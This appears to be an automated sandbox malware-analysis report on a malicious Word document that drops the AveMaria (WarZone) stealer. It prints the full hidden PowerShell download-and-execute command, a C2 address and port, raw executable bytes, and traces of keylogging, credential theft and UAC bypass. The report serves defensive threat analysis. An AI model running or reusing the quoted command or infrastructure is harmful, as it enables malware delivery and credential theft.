Author: Joe Security: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe'', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe'', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2608, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe'', ProcessId: 1868

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: http://13.92.100.208/doc/doc.exe

Avira URL Cloud: Label: malware

Found malware configuration

Show sources

Source: 9.2.doc.exe.23ee3a0.5.raw.unpack

Malware Configuration Extractor: AveMaria {"C2 url": "152.67.253.163", "port": 5300}

Multi AV Scanner detection for submitted file

Show sources

Source: catalogue_2021_samples_list_revise_ol.doc	Virustotal: Detection: 44%			Perma Link
Source: catalogue_2021_samples_list_revise_ol.doc	ReversingLabs: Detection: 31%

Yara detected AveMaria stealer

Show sources

Source: Yara match	File source: 14.2.doc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.doc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.doc.exe.36827d0.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.doc.exe.36827d0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.doc.exe.35c4200.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000003.448380598.00000000005F5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.448429506.0000000000603000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.448388466.00000000005FC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.448500555.0000000000607000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.694525179.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.446479860.00000000023A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.448256879.00000000033A9000.00000004.00000001.sdmp, type: MEMORY

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\doc[1].exe	ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Roaming\doc.exe	ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Roaming\maBdogbw.exe	ReversingLabs: Detection: 31%

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Roaming\doc.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\doc[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\maBdogbw.exe	Joe Sandbox ML: detected

Source: 14.2.doc.exe.400000.1.unpack

Avira: Label: TR/Redcap.ghjpt

Source: C:\Users\user\AppData\Roaming\doc.exe	Code function: 14_2_0040B15E lstrlenA,CryptStringToBinaryA,lstrcpyA,
Source: C:\Users\user\AppData\Roaming\doc.exe	Code function: 14_2_0040CAFC CryptUnprotectData,LocalAlloc,LocalFree,
Source: C:\Users\user\AppData\Roaming\doc.exe	Code function: 14_2_0040CC54 CryptStringToBinaryW,LocalAlloc,CryptStringToBinaryW,LocalFree,
Source: C:\Users\user\AppData\Roaming\doc.exe	Code function: 14_2_0040CCB4 BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGenerateSymmetricKey,
Source: C:\Users\user\AppData\Roaming\doc.exe	Code function: 14_2_0040A632 RegQueryValueExW,GlobalAlloc,CryptUnprotectData,lstrcpyW,
Source: C:\Users\user\AppData\Roaming\doc.exe	Code function: 14_2_0040CF58 LocalAlloc,BCryptDecrypt,LocalFree,

Exploits:

Yara detected UACMe UAC Bypass tool

Show sources

Source: Yara match	File source: 9.2.doc.exe.23ecb30.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.doc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.doc.exe.36827d0.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.doc.exe.36827d0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.doc.exe.35c4200.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000003.448441676.00000000005F8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.448480834.00000000005F5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.446479860.00000000023A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.694590635.000000000054F000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.448256879.00000000033A9000.00000004.00000001.sdmp, type: MEMORY

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Source: C:\Users\user\AppData\Roaming\doc.exe

Directory created: C:\Program Files\Microsoft DN1

Jump to behavior

Source:	Binary string: mscorlib.pdb source: powershell.exe, 00000003.00000002.428352075.0000000002B94000.00000004.00000040.sdmp
Source:	Binary string: :\Windows\mscorlib.pdb source: powershell.exe, 00000003.00000002.428352075.0000000002B94000.00000004.00000040.sdmp
Source:	Binary string: mscorlib.pdbment.Automation.pdbBB source: powershell.exe, 00000003.00000002.428352075.0000000002B94000.00000004.00000040.sdmp
Source:	Binary string: m.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000003.00000002.428352075.0000000002B94000.00000004.00000040.sdmp
Source:	Binary string: scorlib.pdb source: powershell.exe, 00000003.00000002.428352075.0000000002B94000.00000004.00000040.sdmp
Source:	Binary string: :\Windows\dll\mscorlib.pdb source: powershell.exe, 00000003.00000002.428352075.0000000002B94000.00000004.00000040.sdmp
Source:	Binary string: ws\dll\System.pdben source: powershell.exe, 00000003.00000002.428352075.0000000002B94000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbn source: powershell.exe, 00000003.00000002.428352075.0000000002B94000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\dll\System.Management.Automation.pdbmmon source: powershell.exe, 00000003.00000002.428352075.0000000002B94000.00000004.00000040.sdmp
Source:	Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000003.00000002.428352075.0000000002B94000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000003.00000002.428352075.0000000002B94000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb Fil source: powershell.exe, 00000003.00000002.428352075.0000000002B94000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.428352075.0000000002B94000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\System.pdb source: powershell.exe, 00000003.00000002.428352075.0000000002B94000.00000004.00000040.sdmp

Source: C:\Users\user\AppData\Roaming\doc.exe

Code function: 14_2_0041002B GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetDriveTypeW,

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

Source: C:\Users\user\AppData\Roaming\doc.exe	Code function: 14_2_00409DF6 GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA,
Source: C:\Users\user\AppData\Roaming\doc.exe	Code function: 14_2_0040FF27 FindFirstFileW,FindNextFileW,

Software Vulnerabilities:

Document exploit detected (drops PE files)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: doc[1].exe.0.dr

Jump to dropped file

Document exploit detected (creates forbidden files)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File created: C:\Users\user\AppData\Local\Temp\abdtfhghgeghDh .ScT			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\doc[1].exe			Jump to behavior

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 13.92.100.208:80

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 13.92.100.208:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 1560 WEB-MISC /doc/ access 192.168.2.22:49167 -> 13.92.100.208:80
Source: Traffic	Snort IDS: 2022550 ET TROJAN Possible Malicious Macro DL EXE Feb 2016 192.168.2.22:49167 -> 13.92.100.208:80
Source: Traffic	Snort IDS: 1560 WEB-MISC /doc/ access 192.168.2.22:49168 -> 13.92.100.208:80

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: 152.67.253.163

Source: global traffic

HTTP traffic detected: GET /doc/doc.exe HTTP/1.1Host: 13.92.100.208Connection: Keep-Alive

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 28 Sep 2021 19:17:36 GMTServer: Apache/2.4.29 (Ubuntu)Last-Modified: Tue, 28 Sep 2021 06:16:15 GMTETag: "9ba00-5cd08269fe9c0"Accept-Ranges: bytesContent-Length: 637440Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 2e b3 52 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 08 07 00 00 b0 02 00 00 00 00 00 f2 26 07 00 00 20 00 00 00 40 07 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 0a 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a0 26 07 00 4f 00 00 00 00 40 07 00 20 ad 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0a 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f8 06 07 00 00 20 00 00 00 08 07 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 20 ad 02 00 00 40 07 00 00 ae 02 00 00 0a 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 0a 00 00 02 00 00 00 b8 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d4 26 07 00 00 00 00 00 48 00 00 00 02 00 05 00 04 40 00 00 0c a6 02 00 03 00 00 00 0f 00 00 06 10 e6 02 00 90 40 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 01 00 0b 00 00 00 01 00 00 11 00 72 01 00 00 70 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 01 00 00 11 00 72 2b 00 00 70 0a 2b 00 06 2a 00 13 30 01 00 0c 00 00 00 02 00 00 11 00 19 8d 12 00 00 01 0a 2b 00 06 2a 22 02 28 18 00 00 0a 00 2a 5e 02 14 7d 01 00 00 04 02 28 19 00 00 0a 00 00 02 28 08 00 00 06 00 2a 00 00 00 13 30 02 00 1d 00 00 00 03 00 00 11 00 16 0a 2b 0f 73 0c 00 00 06 28 1a 00 00 0a 00 06 17 58 0a 06 17 fe 04 0b 07 2d e9 2a 00 00 00 13 30 02 00 2b 00 00 00 04 00 00 11 00 03 2c 0b 02 7b 01 00 00 04 14 fe 03 2b 01 16 0a 06 2c 0e 00 02 7b 01 00 00 04 6f 1b 00 00 0a 00 00 02 03 28 1c 00 00 0a 00 2a 00 13 30 04 00 31 01 00 00 01 00 00 11 00 02 73 1d 00 00 0a 7d 03 00 00 04 02 28 1e 00 00 0a 00 02 7b 03 00 00 04 20 85 00 00 00 1f 33 73 1f 00 00 0a 6f 20 00 00 0a 00 02 7b 03 00 00 04 72 41 00 00 70 6f 21 00 00 0a 00 02 7b 03 00 00 04 1f 4b 1f 17 73 22 00 00 0a 6f 23 00 00 0a 00 02 7b
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 28 Sep 2021 19:17:41 GMTServer: Apache/2.4.29 (Ubuntu)Last-Modified: Tue, 28 Sep 2021 06:16:15 GMTETag: "9ba00-5cd08269fe9c0"Accept-Ranges: bytesContent-Length: 637440Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 2e b3 52 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 08 07 00 00 b0 02 00 00 00 00 00 f2 26 07 00 00 20 00 00 00 40 07 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 0a 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a0 26 07 00 4f 00 00 00 00 40 07 00 20 ad 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0a 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f8 06 07 00 00 20 00 00 00 08 07 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 20 ad 02 00 00 40 07 00 00 ae 02 00 00 0a 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 0a 00 00 02 00 00 00 b8 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d4 26 07 00 00 00 00 00 48 00 00 00 02 00 05 00 04 40 00 00 0c a6 02 00 03 00 00 00 0f 00 00 06 10 e6 02 00 90 40 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 01 00 0b 00 00 00 01 00 00 11 00 72 01 00 00 70 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 01 00 00 11 00 72 2b 00 00 70 0a 2b 00 06 2a 00 13 30 01 00 0c 00 00 00 02 00 00 11 00 19 8d 12 00 00 01 0a 2b 00 06 2a 22 02 28 18 00 00 0a 00 2a 5e 02 14 7d 01 00 00 04 02 28 19 00 00 0a 00 00 02 28 08 00 00 06 00 2a 00 00 00 13 30 02 00 1d 00 00 00 03 00 00 11 00 16 0a 2b 0f 73 0c 00 00 06 28 1a 00 00 0a 00 06 17 58 0a 06 17 fe 04 0b 07 2d e9 2a 00 00 00 13 30 02 00 2b 00 00 00 04 00 00 11 00 03 2c 0b 02 7b 01 00 00 04 14 fe 03 2b 01 16 0a 06 2c 0e 00 02 7b 01 00 00 04 6f 1b 00 00 0a 00 00 02 03 28 1c 00 00 0a 00 2a 00 13 30 04 00 31 01 00 00 01 00 00 11 00 02 73 1d 00 00 0a 7d 03 00 00 04 02 28 1e 00 00 0a 00 02 7b 03 00 00 04 20 85 00 00 00 1f 33 73 1f 00 00 0a 6f 20 00 00 0a 00 02 7b 03 00 00 04 72 41 00 00 70 6f 21 00 00 0a 00 02 7b 03 00 00 04 1f 4b 1f 17 73 22 00 00 0a 6f 23 00 00 0a 00 02 7b

Source: global traffic

HTTP traffic detected: GET /doc/doc.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 13.92.100.208Connection: Keep-Alive

Source: C:\Users\user\AppData\Roaming\doc.exe

Code function: 14_2_004027D3 URLDownloadToFileW,ShellExecuteW,

Source: Joe Sandbox View	ASN Name: ORACLE-BMC-31898US ORACLE-BMC-31898US
Source: Joe Sandbox View	ASN Name: MICROSOFT-CORP-MSN-AS-BLOCKUS MICROSOFT-CORP-MSN-AS-BLOCKUS

Source: Joe Sandbox View

IP Address: 152.67.253.163 152.67.253.163

Source: global traffic

TCP traffic: 192.168.2.22:49169 -> 152.67.253.163:5300

Source: powershell.exe, 00000003.00000002.433090518.000000000382D000.00000004.00000001.sdmp	String found in binary or memory: httP://13.92.1
Source: powershell.exe, 00000003.00000002.433090518.000000000382D000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.436469540.00000000035CD000.00000004.00000001.sdmp	String found in binary or memory: httP://13.92.100
Source: powershell.exe, 00000003.00000002.433090518.000000000382D000.00000004.00000001.sdmp	String found in binary or memory: httP://13.92.100.208/do
Source: powershell.exe, 00000003.00000002.433090518.000000000382D000.00000004.00000001.sdmp	String found in binary or memory: httP://13.92.100.208/doc/doc.
Source: powershell.exe, 00000005.00000002.429199796.00000000002AF000.00000004.00000020.sdmp	String found in binary or memory: httP://13.92.100.208/doc/doc.exe
Source: powershell.exe, 00000003.00000002.433090518.000000000382D000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.436469540.00000000035CD000.00000004.00000001.sdmp	String found in binary or memory: httP://13.92.100.208/doc/doc.exePE
Source: powershell.exe, 00000005.00000002.436469540.00000000035CD000.00000004.00000001.sdmp	String found in binary or memory: http://13.92.100.208
Source: powershell.exe, 00000005.00000002.436469540.00000000035CD000.00000004.00000001.sdmp	String found in binary or memory: http://13.92.100.208/doc/doc.exe
Source: powershell.exe, 00000003.00000002.427543124.00000000022B0000.00000002.00020000.sdmp, powershell.exe, 00000005.00000002.430729698.00000000023D0000.00000002.00020000.sdmp	String found in binary or memory: http://www.%s.comPA
Source: powershell.exe, 00000003.00000002.426929590.000000000022F000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000003.00000002.426929590.000000000022F000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.coL
Source: powershell.exe, 00000003.00000002.426929590.000000000022F000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/
Source: doc.exe	String found in binary or memory: https://github.com/syohex/java-simple-mine-sweeper

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{023FDC9E-1C42-46A7-9085-716C914A6086}.tmp

Jump to behavior

Source: C:\Users\user\AppData\Roaming\doc.exe

Code function: 14_2_0040562F setsockopt,recv,recv,

Source: global traffic	HTTP traffic detected: GET /doc/doc.exe HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 13.92.100.208Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /doc/doc.exe HTTP/1.1Host: 13.92.100.208Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 13.92.100.208
Source: unknown	TCP traffic detected without corresponding DNS query: 13.92.100.208
Source: unknown	TCP traffic detected without corresponding DNS query: 13.92.100.208
Source: unknown	TCP traffic detected without corresponding DNS query: 13.92.100.208
Source: unknown	TCP traffic detected without corresponding DNS query: 13.92.100.208
Source: unknown	TCP traffic detected without corresponding DNS query: 13.92.100.208
Source: unknown	TCP traffic detected without corresponding DNS query: 13.92.100.208
Source: unknown	TCP traffic detected without corresponding DNS query: 13.92.100.208
Source: unknown	TCP traffic detected without corresponding DNS query: 13.92.100.208
Source: unknown	TCP traffic detected without corresponding DNS query: 13.92.100.208
Source: unknown	TCP traffic detected without corresponding DNS query: 13.92.100.208
Source: unknown	TCP traffic detected without corresponding DNS query: 13.92.100.208
Source: unknown	TCP traffic detected without corresponding DNS query: 13.92.100.208
Source: unknown	TCP traffic detected without corresponding DNS query: 13.92.100.208
Source: unknown	TCP traffic detected without corresponding DNS query: 13.92.100.208
Source: unknown	TCP traffic detected without corresponding DNS query: 13.92.100.208
Source: unknown	TCP traffic detected without corresponding DNS query: 13.92.100.208
Source: unknown	TCP traffic detected without corresponding DNS query: 13.92.100.208
Source: unknown	TCP traffic detected without corresponding DNS query: 13.92.100.208
Source: unknown	TCP traffic detected without corresponding DNS query: 13.92.100.208
Source: unknown	TCP traffic detected without corresponding DNS query: 13.92.100.208
Source: unknown	TCP traffic detected without corresponding DNS query: 13.92.100.208
Source: unknown	TCP traffic detected without corresponding DNS query: 13.92.100.208
Source: unknown	TCP traffic detected without corresponding DNS query: 13.92.100.208
Source: unknown	TCP traffic detected without corresponding DNS query: 13.92.100.208
Source: unknown	TCP traffic detected without corresponding DNS query: 13.92.100.208
Source: unknown	TCP traffic detected without corresponding DNS query: 13.92.100.208
Source: unknown	TCP traffic detected without corresponding DNS query: 13.92.100.208
Source: unknown	TCP traffic detected without corresponding DNS query: 13.92.100.208
Source: unknown	TCP traffic detected without corresponding DNS query: 13.92.100.208
Source: unknown	TCP traffic detected without corresponding DNS query: 13.92.100.208
Source: unknown	TCP traffic detected without corresponding DNS query: 13.92.100.208
Source: unknown	TCP traffic detected without corresponding DNS query: 13.92.100.208
Source: unknown	TCP traffic detected without corresponding DNS query: 13.92.100.208
Source: unknown	TCP traffic detected without corresponding DNS query: 13.92.100.208
Source: unknown	TCP traffic detected without corresponding DNS query: 13.92.100.208
Source: unknown	TCP traffic detected without corresponding DNS query: 13.92.100.208
Source: unknown	TCP traffic detected without corresponding DNS query: 13.92.100.208
Source: unknown	TCP traffic detected without corresponding DNS query: 13.92.100.208
Source: unknown	TCP traffic detected without corresponding DNS query: 13.92.100.208
Source: unknown	TCP traffic detected without corresponding DNS query: 13.92.100.208
Source: unknown	TCP traffic detected without corresponding DNS query: 13.92.100.208
Source: unknown	TCP traffic detected without corresponding DNS query: 13.92.100.208
Source: unknown	TCP traffic detected without corresponding DNS query: 13.92.100.208
Source: unknown	TCP traffic detected without corresponding DNS query: 13.92.100.208
Source: unknown	TCP traffic detected without corresponding DNS query: 13.92.100.208
Source: unknown	TCP traffic detected without corresponding DNS query: 13.92.100.208
Source: unknown	TCP traffic detected without corresponding DNS query: 13.92.100.208
Source: unknown	TCP traffic detected without corresponding DNS query: 13.92.100.208
Source: unknown	TCP traffic detected without corresponding DNS query: 13.92.100.208

Source: C:\Users\user\AppData\Roaming\doc.exe

Code function: 14_2_004089D5 GetAsyncKeyState,wsprintfW,GetAsyncKeyState,wsprintfW,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetKeyNameTextW,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,CallNextHookEx,

Source: C:\Users\user\AppData\Roaming\doc.exe

Code function: 14_2_0040902E DefWindowProcA,GetRawInputData,GetRawInputData,GetForegroundWindow,GetWindowTextW,lstrlenW,lstrcpyW,CreateFileW,WriteFile,lstrlenW,WriteFile,lstrlenW,WriteFile,WriteFile,lstrlenW,WriteFile,lstrlenW,WriteFile,lstrlenW,WriteFile,CloseHandle,PostQuitMessage,RegisterRawInputDevices,

E-Banking Fraud:

Yara detected AveMaria stealer

Show sources

Source: Yara match	File source: 14.2.doc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.doc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.doc.exe.36827d0.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.doc.exe.36827d0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.doc.exe.35c4200.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000003.448380598.00000000005F5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.448429506.0000000000603000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.448388466.00000000005FC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.448500555.0000000000607000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.694525179.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.446479860.00000000023A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.448256879.00000000033A9000.00000004.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 9.2.doc.exe.23ecb30.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 14.2.doc.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 14.2.doc.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 14.2.doc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 14.2.doc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 14.2.doc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
